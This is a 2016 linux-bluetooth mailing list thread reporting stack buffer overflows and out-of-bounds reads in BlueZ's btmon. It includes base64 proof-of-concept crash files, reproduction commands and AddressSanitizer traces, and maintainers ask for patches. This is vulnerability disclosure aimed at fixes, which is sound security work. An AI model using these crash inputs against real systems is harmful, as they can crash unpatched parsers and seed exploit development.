> 0x0f4042c658b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0f4042c658c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0f4042c658d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0f4042c658e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> =>0x0f4042c658f0: 00 00 00 00 00 00 00 00 00 00 00 00[02]f4 f3 f3
> 0x0f4042c65900: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0f4042c65910: 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00
> 0x0f4042c65920: 00 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00 00 00
> 0x0f4042c65930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0f4042c65940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> Shadow byte legend (one shadow byte represents 8 application bytes):
> Addressable: 00
> Partially addressable: 01 02 03 04 05 06 07
> Heap left redzone: fa
> Heap right redzone: fb
> Freed heap region: fd
> Stack left redzone: f1
> Stack mid redzone: f2
> Stack right redzone: f3
> Stack partial redzone: f4
> Stack after return: f5
> Stack use after scope: f8
> Global redzone: f9
> Global init order: f6
> Poisoned by user: f7
> Contiguous container OOB:fc
> ASan internal: fe
> ==13306==ABORTING
>
> Machine: x86_64
> OS: linux-gnu
> Compiler: gcc
> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
> Machine Type: x86_64-unknown-linux-gnu
> BlueZ Version: 5.42
> Release Status: release
> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>
> Description:
>
> An buffer overflow was observed in "pklg_read_hci" function in "btsnoop.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
>
> ./monitor/btmon -r <PoC File>
>
>
>
> PoC.file base64 encoded:
>
> AAAQABkQAKLNFQCAAgICFwIXAAEABU5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5O
> Tk5OTqGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGhoaGh
> oU5OTk5OTk5OTk5OTk5dTgAAdXV1dXV1dXV1dXV1dXV1MyQ+Plj7AbrYA4QBABIgPj08Gjq6AAME
> AQC62AMEAQAwPkc+WgABABAD3AEAPgAEGj4uPrrYEgQBAIw+Pk1YGj66AAMEAQAAkI+PAECPlNOA
> AAEAEj5NPlgC/4AA9gQBABI+PgEAAAC6AAMEAT4+AQAAALoAAwQB/3///z5YAAEfAA7mAQA+CAQa
> Pho+utgDBAEAMD4+PlgAAR8AA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBPUAEj4+PlgaPrrY
> AwQBACKdAAAYGj66AAMEAQASJD4+WBo+utgDBAEA/38AAAwaPgAAAAEBADMkPj5YAAG62AOEAQAS
> ID49PBo6ugADBAEAutgDBAEAMD5HPloAAQAQA9wBAD4ABBo+Lj66ABAfAAPmAQABAAQWcHBwcHBw
> cP//f/9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT71PT09PT4D/T09PT09PD09P
> T09PT09PT09PT09PT09PT09PT09PT09PT09RT09PUk9PT09PT09PT09PT09PT0////8ABAkEAiAA
> KgUZEACizRUVNAICABI+PgEAAAC6CQMEAf9///8+WAABHwAO5gEAPggEGj4aPrrYAwQBAE0+Pj5Y
> AAEfAAPmAQA+AAQWPkA+//8DBAEABT4+PVgGPrroAwT1ABI+Pj5YGj662AMEAQBDnQAAAQA+CAQa
> Pho+utgDBAEAMD4+PlgAAR8AA+YBAD4ABBY+QD7//wMEAQAFPj49WAY+uugDBPUAEj4+PlgaPrrY
> AwQBAEOdAAAYGj66AAMEAQASJD4+WBo+utgDBAEA/38AAAwaPgAAAAEBABgaProAAwQBABIkPj5Y
> Gj662AMEAQD/fwAADBo+AAAAAQEAMyQ+PlgAAbrYA4QBABIgPj08Gjq6AAMEDwC62AMEAQAwPkc+
> WgABABwD3AEAPgAEGj4uPrrYEgQBAIw+Pk1YGj66AAMEAQAAkI+PAEBPT09PT09PT09PT09PT09P
> T09PT09PT08DhAEAEiA+PTwaOroAAwQBALrYAwQBADA+Rz5aAAEAEAPcAQA+j5TTgAABABI+TT5Y
> Av+AAPYEAQASPj4BAAAAugADBAEAED4+PlgWAR8ADuYBAD4IBBo+Gj662E5OTk5OTk5dTk51dXV1
> dXV1dXV1dXV1dXV1dXV1dXV1dXVOTk5OTk5OTk5OTk5OTk5OTk5OTugLAAAC////fwIXAAGA////
> AAQJBAIgACoFGRAAnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ1AnZ2dnZ2dnZ2dnZ2dnZ2dnZ2d
> nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ0AAAC6AAMEAQAQPj4+WAABH09PT09P
> T09PT08PT09PT09PT09PT09PT09PT09PT09PT3BwcHBwcJJwcHBwiHBwcHDucHBwcHBwcHBwcHBw
> cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwEHBwcHBwcHBwcHBwcHBwcHBwT3Bw
> cAIgACoFGRAAos0VFTQCAgAgPj4BAAAAugADBAH/f///PlgAAR8ADuYBAD4IBHBwPgAZGj5wcHBw
> cHBgcHBwcHBwcHBwcHBwQHBwcHBwcHBwGj662BIEAQCMPj5NWBoADuYBAD4IBHBwPgAZGj5wcHBw
> cHBgcHBwcHBwcHBwcHBwQHBwcHBwcHBwGj662BIEAQCMPj5NWBo+ugADBAEAEiA+Plj///9/EAQB
> ABI+TVgGProAAwQBABI+Pj5YJAAQQA==
>
>
>
> Affected code:
>
> 368 *index = 0xffff;
> 369 *opcode = 0xffff;
> 370 break;
> 371 }
> 372
> 373 len = read(btsnoop->fd, data, toread);
> 374 if (len < 0) {
> 375 btsnoop->aborted = true;
> 376 return false;
> 377 }
>
>
>
> Repeat-By:
> echo <above base64> > PoC.64
> base64 -d PoC.b64 > PoC.file
> valgrind ./monitor/btmon -r PoC.file
>
>
> ASAN Report (bluez needs to compiled with -fsanitize=address for this):
>
> =================================================================
> ==1986==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x73f4d87b94c2 at pc 0x663b1aef59b6 bp 0x73f4d87b8c50 sp 0x73f4d87b8c38
> WRITE of size 1491 at 0x73f4d87b94c2 thread T0
> #0 0x663b1aef59b5 in read (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x299b5)
> #1 0x544a17 in pklg_read_hci src/shared/btsnoop.c:373
> #2 0x544a17 in btsnoop_read_hci src/shared/btsnoop.c:433
> #3 0x417efd in control_reader monitor/control.c:1408
> #4 0x40a142 in main monitor/main.c:220
> #5 0x663b1a933b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
> #6 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>
> Address 0x73f4d87b94c2 is located in stack of thread T0 at offset 1778 in frame
> #0 0x417b4f in control_reader monitor/control.c:1375
>
> This frame has 5 object(s):
> [32, 34) 'pktlen'
> [96, 98) 'index'
> [160, 162) 'frequency'
> [224, 240) 'tv'
> [288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
> HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
> (longjmp and C++ exceptions *are* supported)
> SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 read
> Shadow bytes around the buggy address:
> 0x0e7f1b0ef240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0e7f1b0ef250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0e7f1b0ef260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0e7f1b0ef270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0e7f1b0ef280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> =>0x0e7f1b0ef290: 00 00 00 00 00 00 00 00[02]f4 f3 f3 f3 f3 00 00
> 0x0e7f1b0ef2a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
> 0x0e7f1b0ef2b0: f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0e7f1b0ef2c0: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
> 0x0e7f1b0ef2d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0e7f1b0ef2e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> Shadow byte legend (one shadow byte represents 8 application bytes):
> Addressable: 00
> Partially addressable: 01 02 03 04 05 06 07
> Heap left redzone: fa
> Heap right redzone: fb
> Freed heap region: fd
> Stack left redzone: f1
> Stack mid redzone: f2
> Stack right redzone: f3
> Stack partial redzone: f4
> Stack after return: f5
> Stack use after scope: f8
> Global redzone: f9
> Global init order: f6
> Poisoned by user: f7
> Contiguous container OOB:fc
> ASan internal: fe
> ==1986==ABORTING
> Machine: x86_64
> OS: linux-gnu
> Compiler: gcc
> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
> Machine Type: x86_64-unknown-linux-gnu
> BlueZ Version: 5.42
> Release Status: release
> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>
> Description:
>
> A out-of-bound read was identified in "print_hex_field" function in "monitor/packet.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
>
> ./monitor/btmon -r <PoC File>
>
>
> PoC.file base64 encoded:
>
> AAAADCQkLv9/AIAAARUB3QAAAAwdJCT/f4gAAQE=
>
>
>
> Affected code:
>
> 1908 static void print_hex_field(const char *label, const uint8_t *data,
> 1909 uint8_t le n)
> 1910 {
> 1911 char str[len * 2 + 1];
> 1912 uint8_t i;
> 1913
> 1914 str[0] = '\0';
> 1915
> 1916 for (i = 0; i < len; i++)
> 1917 sprintf(str + (i * 2), "%2.2x", data[i]);
> 1918
>
>
>
>
> Repeat-By:
> echo <above base64> > PoC.64
> base64 -d PoC.b64 > PoC.file
> valgrind ./monitor/btmon -r PoC.file
>
>
> ASAN Report (bluez needs to compiled with -fsanitize=address for this):
>
> ==17737==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x77c32d2411a2 at pc 0x431421 bp 0x77c32d240700 sp 0x77c32d2406f8
> READ of size 1 at 0x77c32d2411a2 thread T0
> #0 0x431420 in print_hex_field monitor/packet.c:1917
> #1 0x44428d in print_key monitor/packet.c:1924
> #2 0x44428d in print_link_key monitor/packet.c:1929
> #3 0x44428d in return_link_keys_evt monitor/packet.c:7803
> #4 0x47d5f8 in packet_hci_event monitor/packet.c:9072
> #5 0x483025 in packet_monitor monitor/packet.c:3843
> #6 0x417f68 in control_reader monitor/control.c:1415
> #7 0x40a142 in main monitor/main.c:220
> #8 0x74bb760f0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
> #9 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>
> Address 0x77c32d2411a2 is located in stack of thread T0 at offset 1778 in frame
> #0 0x417b4f in control_reader monitor/control.c:1375
>
> This frame has 5 object(s):
> [32, 34) 'pktlen'
> [96, 98) 'index'
> [160, 162) 'frequency'
> [224, 240) 'tv'
> [288, 1778) 'buf' <== Memory access at offset 1778 overflows this variable
> HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
> (longjmp and C++ exceptions *are* supported)
> SUMMARY: AddressSanitizer: stack-buffer-overflow monitor/packet.c:1917 print_hex_field
> Shadow bytes around the buggy address:
> 0x0ef8e5a401e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0ef8e5a401f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0ef8e5a40200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0ef8e5a40210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0ef8e5a40220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> =>0x0ef8e5a40230: 00 00 00 00[02]f4 f3 f3 f3 f3 00 00 00 00 00 00
> 0x0ef8e5a40240: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00
> 0x0ef8e5a40250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 f3
> 0x0ef8e5a40260: f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0ef8e5a40270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> 0x0ef8e5a40280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
> Shadow byte legend (one shadow byte represents 8 application bytes):
> Addressable: 00
> Partially addressable: 01 02 03 04 05 06 07
> Heap left redzone: fa
> Heap right redzone: fb
> Freed heap region: fd
> Stack left redzone: f1
> Stack mid redzone: f2
> Stack right redzone: f3
> Stack partial redzone: f4
> Stack after return: f5
> Stack use after scope: f8
> Global redzone: f9
> Global init order: f6
> Poisoned by user: f7
> Contiguous container OOB:fc
> ASan internal: fe
> ==17737==ABORTING
>
^ permalink raw reply [flat|nested] 8+ messages in thread* Re: multiple buffer overflows and out-of-bound reads
2016-11-15 12:01 ` Johan Hedberg
@ 2016-11-15 12:12 ` op7ic \x00
0 siblings, 0 replies; 8+ messages in thread
From: op7ic \x00 @ 2016-11-15 12:12 UTC (permalink / raw)
To: op7ic \x00, François Beaufort, Luiz Augusto von Dentz,
linux-bluetooth@vger.kernel.org
if I unclog my work pipeline a bit then potentially. I`ll keep an eye
on proposing new patches for these reports at the end of my testing
cycle for bluez.
On Tue, Nov 15, 2016 at 12:01 PM, Johan Hedberg <johan.hedberg@gmail.com> w=
rote:
> Hi op7ic,
>
> Is there any chance that you could try convert these to actual patches
> to fix the issues?
>
> Johan
>
> On Tue, Nov 15, 2016, op7ic \x00 wrote:
>> here are 4 crashes resulting in either out-of-bound reads or buffer
>> overflows (see attached) but this time in btmon. They are pretty much
>> similar to bugs reported previously.
>>
>> On Tue, Nov 15, 2016 at 10:51 AM, op7ic \x00 <op7ica@gmail.com> wrote:
>> > I got couple in btmon and I started looking at BO's in btmon too.
>> >
>> > FWIW whenever the code base is shared similar bugs will appear. You
>> > notice that a lot of BO issues reported are for example due to
>> > unchecked memcpy or just lack of boundary verification on arrays etc .
>> > Once you hit that point same bug appears.
>> >
>> >
>> >
>> >
>> > On Tue, Nov 15, 2016 at 10:41 AM, Fran=C3=A7ois Beaufort
>> > <beaufort.francois@gmail.com> wrote:
>> >> FWIW, I have been witnessing btmon buffer overflows this morning but
>> >> can't reproduce anymore.
>> >>
>> >> On Tue, Nov 15, 2016 at 10:25 AM, op7ic \x00 <op7ica@gmail.com> wrote=
:
>> >>> alright will do - thanks for replying.
>> >>>
>> >>> On Tue, Nov 15, 2016 at 9:18 AM, Luiz Augusto von Dentz
>> >>> <luiz.dentz@gmail.com> wrote:
>> >>>> Hi,
>> >>>>
>> >>>> On Mon, Nov 14, 2016 at 7:06 PM, op7ic \x00 <op7ica@gmail.com> wrot=
e:
>> >>>>> Hello list,
>> >>>>>
>> >>>>> I have been playing with hcidump tool recently and came across
>> >>>>> following bugs coming from either out-of-bound reads or buffer
>> >>>>> overflows (see attached reports).
>> >>>>>
>> >>>>> There are couple more I`m working on and will send these later.
>> >>>>
>> >>>> I guess we want these to be tested against btmon, hcidump is a depr=
ecated.
>> >>>>
>> >>>> --
>> >>>> Luiz Augusto von Dentz
>> >>> --
>> >>> To unsubscribe from this list: send the line "unsubscribe linux-blue=
tooth" in
>> >>> the body of a message to majordomo@vger.kernel.org
>> >>> More majordomo info at http://vger.kernel.org/majordomo-info.html
>
>> Machine: x86_64
>> OS: linux-gnu
>> Compiler: gcc
>> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=3Daddress
>> Machine Type: x86_64-unknown-linux-gnu
>> BlueZ Version: 5.42
>> Release Status: release
>> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>>
>> Description:
>>
>> A buffer overflow was identified in "l2cap_packet" function in "monitor/=
packet.c" source file. This issue can be triggered by processing a corrupte=
d dump file and will result in hcidump crash. To replicate this issue use t=
he attached sample below and execute the following command:
>>
>> ./monitor/btmon -r <PoC File>
>>
>>
>> PoC.file base64 encoded:
>>
>> AAAAGAOEAAAAABAAAAMAEAkjChgAAwP7AgMDAxADEBAJIwoYAAMD+wIDAwMQAxAAAwMDAA=
=3D=3D
>>
>>
>>
>> Affected code:
>>
>> 3161 index_list[index][in].frag_buf =3D malloc(len);
>> 3162 if (!index_list[index][in].frag_buf) {
>> 3163 print_text(COLOR_ERROR, "failed buffer allo=
cation") ;
>> 3164 packet_hexdump(data, size);
>> 3165 return;
>> 3166 }
>> 3167
>> 3168 memcpy(index_list[index][in].frag_buf, data, size);
>> 3169 index_list[index][in].frag_pos =3D size;
>> 3170 index_list[index][in].frag_len =3D len - size;
>> 3171 index_list[index][in].frag_cid =3D cid;
>> 3172 break;
>>
>>
>>
>> Repeat-By:
>> echo <above base64> > PoC.64
>> base64 -d PoC.b64 > PoC.file
>> valgrind ./monitor/btmon -r PoC.file
>>
>>
>> ASAN Report (bluez needs to compiled with -fsanitize=3Daddress for this=
):
>>
>> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>> =3D=3D27023=3D=3DERROR: AddressSanitizer: stack-buffer-overflow on addre=
ss 0x76cf40a9c2c2 at pc 0x679d7a177792 bp 0x76cf40a9b830 sp 0x76cf40a9aff0
>> READ of size 4095 at 0x76cf40a9c2c2 thread T0
>> < HCI Command: Unknown (0x00|0x0003) plen 16 =
[hci0] 0.004096
>> 09 23 0a 18 00 03 03 fb 02 03 03 03 .#..........
>> < ACL Data TX: Handle 771 flags 0x00 dlen 4099 =
[hci0] 94308888.197627
>> #0 0x679d7a177791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
>> #1 0x4b9ecc in l2cap_packet monitor/l2cap.c:3168
>> #2 0x47dda6 in packet_hci_acldata monitor/packet.c:9115
>> #3 0x483777 in packet_monitor monitor/packet.c:3846
>> #4 0x417f68 in control_reader monitor/control.c:1415
>> #5 0x40a142 in main monitor/main.c:220
>> #6 0x679d79bb0b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.s=
o.6+0x21b44)
>> #7 0x40b03e (/opt/bluez/monitor/btmon+0x40b03e)
>>
>> Address 0x76cf40a9c2c2 is located in stack of thread T0 at offset 1778 i=
n frame
>> #0 0x417b4f in control_reader monitor/control.c:1375
>>
>> This frame has 5 object(s):
>> [32, 34) 'pktlen'
>> [96, 98) 'index'
>> [160, 162) 'frequency'
>> [224, 240) 'tv'
>> [288, 1778) 'buf' <=3D=3D Memory access at offset 1778 overflows thi=
s variable
>> HINT: this may be a false positive if your program uses some custom stac=
k unwind mechanism or swapcontext
>> (longjmp and C++ exceptions *are* supported)
>> SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ??
>> Shadow bytes around the buggy address:
>> 0x0eda6814b800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> =3D>0x0eda6814b850: 00 00 00 00 00 00 00 00[02]f4 f3 f3 f3 f3 00 00
>> 0x0eda6814b860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
>> 0x0eda6814b870: f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b880: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> 0x0eda6814b8a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>> Shadow byte legend (one shadow byte represents 8 application bytes):
>> Addressable: 00
>> Partially addressable: 01 02 03 04 05 06 07
>> Heap left redzone: fa
>> Heap right redzone: fb
>> Freed heap region: fd
>> Stack left redzone: f1
>> Stack mid redzone: f2
>> Stack right redzone: f3
>> Stack partial redzone: f4
>> Stack after return: f5
>> Stack use after scope: f8
>> Global redzone: f9
>> Global init order: f6
>> Poisoned by user: f7
>> Contiguous container OOB:fc
>> ASan internal: fe
>> =3D=3D27023=3D=3DABORTING
>
>> Machine: x86_64
>> OS: linux-gnu
>> Compiler: gcc
>> Compilation CFLAGS: -O0 -ggdb3 -fsanitize=3Daddress
>> Machine Type: x86_64-unknown-linux-gnu
>> BlueZ Version: 5.42
>> Release Status: release
>> Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
>>
>> Description:
>>
>> A out-of-bound read was identified in "packet_hexdump" function in "moni=
tor/packet.c" source file. This issue can be triggered by processing a corr=
upted dump file and will result in hcidump crash. To replicate this issue u=
se the attached sample below and execute the following command:
>>
>> ./monitor/btmon -r <PoC File>
>>
>>
>> PoC.file base64 encoded:
>> AACACQQHGAAaERDoAwAAAAkjBxgAAwMDAwMDAwMDAwMDAwMDAwMDAw=3D=3D
>>
>>
>> Affected code:
>>
>> 3736 static const char hexdigits[] =3D "0123456789abcdef";
>> 3737 char str[68];
>> 3738 uint16_t i;
>> 3739
>> 3740 if (!len)
>> 3741 return;
>> 3742
>> 3743 for (i =3D 0; i < len; i++) {
>> 3744 str[((i % 16) * 3) + 0] =3D hexdigits[buf[i] >> 4]=
;
>> 3745 str[((i % 16) * 3) + 1] =3D hexdigits[buf[i] & 0xf=
];
>> 3746 str[((i % 16) * 3) + 2] =3D ' ';
>>
>>
>>
>> Repeat-By:
>> echo <above base64> > PoC.64
>> base64 -d PoC.b64 > PoC.file
>> valgrind ./monitor/btmon -r PoC.file
>>
>>
>> ASAN Report (bluez needs to compiled with -fsanitize=3Daddress for this=
):
>>
>> =3D=3D13306=3D=3DERROR: AddressSanitizer: stack-buffer-overflow on addre=
ss 0x79fe1636c7e2 at pc 0x42cb3c bp 0x79fe1636bca0 sp 0x79fe1636bc98
>> READ of size 1 at 0x79fe1636c7e2 thread T0
>> > ACL Data RX: Handle 0 flags 0x00 dlen 2304 =
=
=
[hci0] 0.437326056
>> invalid packet size (32764 !=3D 2304)
>> 23 07 18 00 03 03 03 03 03 03 03 03 03 03 03 03 #..............=
.
>> 03 03 03 03 03 03 03 00 00 00 00 00 20 08 82 40 ............ ..=
@
>> 00 28 80 20 00 00 00 00 40 01 40 23 00 00 00 00 .(. ....@.@#...=
.
>> a0 04 20 00 00 00 00 00 00 04 00 80 00 00 00 00 .. ............=
.
>> 00 00 10 04 ff ff ff ff 04 01 04 86 9a 39 1c 20 .............9.
>> 54 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Tp.............=
.
>> 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ...............=
.
>> ff ff ff ff 04 00 00 00 4c 00 00 00 00 00 00 00 ........L......=
.
>> 00 00 00 00 9a 39 1c 20 54 70 00 00 00 00 00 00 .....9. Tp.....=
.
>> 00 00 00 00 56 98 54 00 00 00 00 00 80 c8 36 00 ....V.T.......6=
.
>> 00 00 00 00 1b 00 00 00 00 00 00 00 59 98 54 00 ............Y.T=
.
>> 00 00 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .......!Tp....2=
.
>> 54 70 00 00 62 53 61 21 54 70 00 00 00 00 00 00 Tp..bSa!Tp.....=
.
>> 00 00 00 00 74 78 61 21 54 70 00 00 80 c5 36 16 ....txa!Tp....6=
.
>> fe 79 00 00 00 b0 82 21 54 70 00 00 00 00 00 00 .y.....!Tp.....=
.
>> 00 00 00 00 08 00 00 00 30 00 00 00 50 c8 36 16 ........0...P.6=
.
>> fe 79 00 00 90 c7 36 16 fe 79 00 00 50 f8 1d 20 .y....6..y..P..
>> 54 70 00 00 a0 e2 51 20 54 70 00 00 00 00 00 00 Tp....Q Tp.....=
.
>> 00 00 00 00 00 00 00 00 00 00 00 00 18 c8 36 16 ..............6=
.
>> fe 79 00 00 17 c8 36 16 fe 79 00 00 34 c3 36 16 .y....6..y..4.6=
.
>> fe 79 00 00 00 00 00 00 00 00 00 00 00 00 00 91 .y.............=
.
>> 6d 2c fc f3 01 00 00 00 00 00 00 00 80 c5 36 16 m,............6=
.
>> fe 79 00 00 00 80 81 21 54 70 00 00 a2 e5 32 1f .y.....!Tp....2=
.
>> 54 70 00 00 00 00 e0 85 6d 2c fc f3 00 00 c2 f0 Tp......m,.....=
.
>> c2 42 a8 e0 00 00 00 00 00 00 00 00 80 c5 36 16 .B............6=
.
>> fe 79 00 00 b8 79 82 21 54 70 00 00 51 45 52 20 .y...y.!Tp..QER
>> 54 70 00 00 00 00 40 86 6d 2c fc f3 00 00 c2 f0 Tp....@.m,.....=
.
>> c2 42 a8 e0 06 00 00 00 00 00 00 00 80 c5 36 16 .B............6=
.
>> fe 79 00 00 05 16 62 21 54 70 00 00 89 53 74 20 .y....b!Tp...St
>> 54 70 00 00 c8 86 81 21 54 70 00 00 01 00 00 00 Tp.....!Tp.....=
.
>> 00 00 00 00 80 c8 36 16 fe 79 00 00 98 86 81 21 ......6..y.....=
!
>> 54 70 00 00 9b 5b 61 21 54 70 00 00 00 00 01 00 Tp...[a!Tp.....=
.
>> 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 ...............=
.
>> 01 00 00 00 35 63 61 21 54 70 00 00 01 00 00 00 ....5ca!Tp.....=
.
>> fe 79 00 00 00 80 81 21 54 70 00 00 00 00 00 00 .y.....!Tp.....=
.
>> 00 00 00 00 28 ea 9c 20 54 70 00 00 68 0a 73 20 ....(.. Tp..h.s
>> 54 70 00 00 b5 55 61 21 54 70 00 00 01 00 00 00 Tp...Ua!Tp.....=
.
>> fe 79 00 00 d8 99 81 21 54 70 00 00 30 c4 36 16 .y.....!Tp..0.6=
.
>> fe 79 00 00 1c 1c 61 21 54 70 00 00 a8 e8 9c 20 .y....a!Tp.....
>> 54 70 00 00 1c 1c 61 21 54 70 00 00 03 00 00 00 Tp....a!Tp.....=
.
>> 00 00 00 00 2e 03 31 1c 00 00 00 00 03 00 00 00 ......1........=
.
>> 00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............=
!
>> 54 70 00 00 8e 25 61 21 54 70 00 00 28 bd 17 20 Tp...%a!Tp..(..
>> 54 70 00 00 00 c5 36 16 fe 79 00 00 28 bd 17 20 Tp....6..y..(..
>> 54 70 00 00 48 c1 17 20 54 70 00 00 10 c6 36 16 Tp..H.. Tp....6=
.
>> fe 79 00 00 0c c4 70 00 00 00 00 00 00 c6 36 16 .y....p.......6=
.
>> fe 79 00 00 80 87 81 21 54 70 00 00 00 00 00 00 .y.....!Tp.....=
.
>> 00 00 00 00 80 87 81 21 54 70 00 00 00 a0 81 21 .......!Tp.....=
!
>> 54 70 00 00 04 14 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
>> 54 70 00 00 70 0a 40 00 00 00 00 00 00 00 00 00 Tp..p.@........=
.
>> 01 00 00 00 2c 00 00 00 01 00 00 00 90 c6 36 16 ....,.........6=
.
>> fe 79 00 00 80 87 81 21 54 70 00 00 a0 c6 36 16 .y.....!Tp....6=
.
>> fe 79 00 00 00 b5 82 21 54 70 00 00 c8 c6 36 16 .y.....!Tp....6=
.
>> fe 79 00 00 a8 b1 82 21 54 70 00 00 01 00 00 00 .y.....!Tp.....=
.
>> 00 00 00 00 3d 27 61 21 54 70 00 00 00 00 00 00 ....=3D'a!Tp...=
...
>> 00 00 00 00 80 87 81 21 54 70 00 00 01 00 00 00 .......!Tp.....=
.
>> 54 70 00 00 00 00 00 00 00 00 00 00 01 00 00 00 Tp.............=
.
>> 00 00 00 00 a8 b1 82 21 54 70 00 00 03 00 00 00 .......!Tp.....=
.
>> 00 00 00 00 0b 00 00 00 00 00 00 00 f8 86 81 21 ...............=
!
>> 54 70 00 00 8e 25 61 21 54 70 00 00 00 00 00 00 Tp...%a!Tp.....=
.
>> 00 00 00 00 00 b5 82 21 54 70 00 00 10 c6 36 16 .......!Tp....6=
.
>> fe 79 00 00 00 c6 36 16 fe 79 00 00 2e 03 31 1c .y....6..y....1=
.
>> 00 00 00 00 04 14 40 00 00 00 00 00 ff ff ff ff ......@........=
.
>> 00 00 00 00 20 0f 40 00 00 00 00 00 48 c1 17 20 .... .@.....H..
>> 54 70 00 00 00 a0 81 21 54 70 00 00 00 a0 81 21 Tp.....!Tp.....=
!
>> 54 70 00 00 da 15 40 00 00 00 00 00 78 8d 18 20 Tp....@.....x..
>> 54 70 00 00 38 03 40 00 00 00 00 00 00 00 00 00 Tp..8.@........=
.
>> 01 00 00 00 54 02 00 00 01 00 00 00 01 00 00 00 ....T..........=
.
>> 00 00 00 00 80 87 81 21 54 70 00 00 b0 c7 36 16 .......!Tp....6=
.
>> fe 79 00 00 00 b5 82 21 54 70 00 00 d8 c7 36 16 .y.....!Tp....6=
.
>> fe 79 00 00 e8 56 7d 00 00 00 00 00 00 00 00 00 .y...V}........=
.
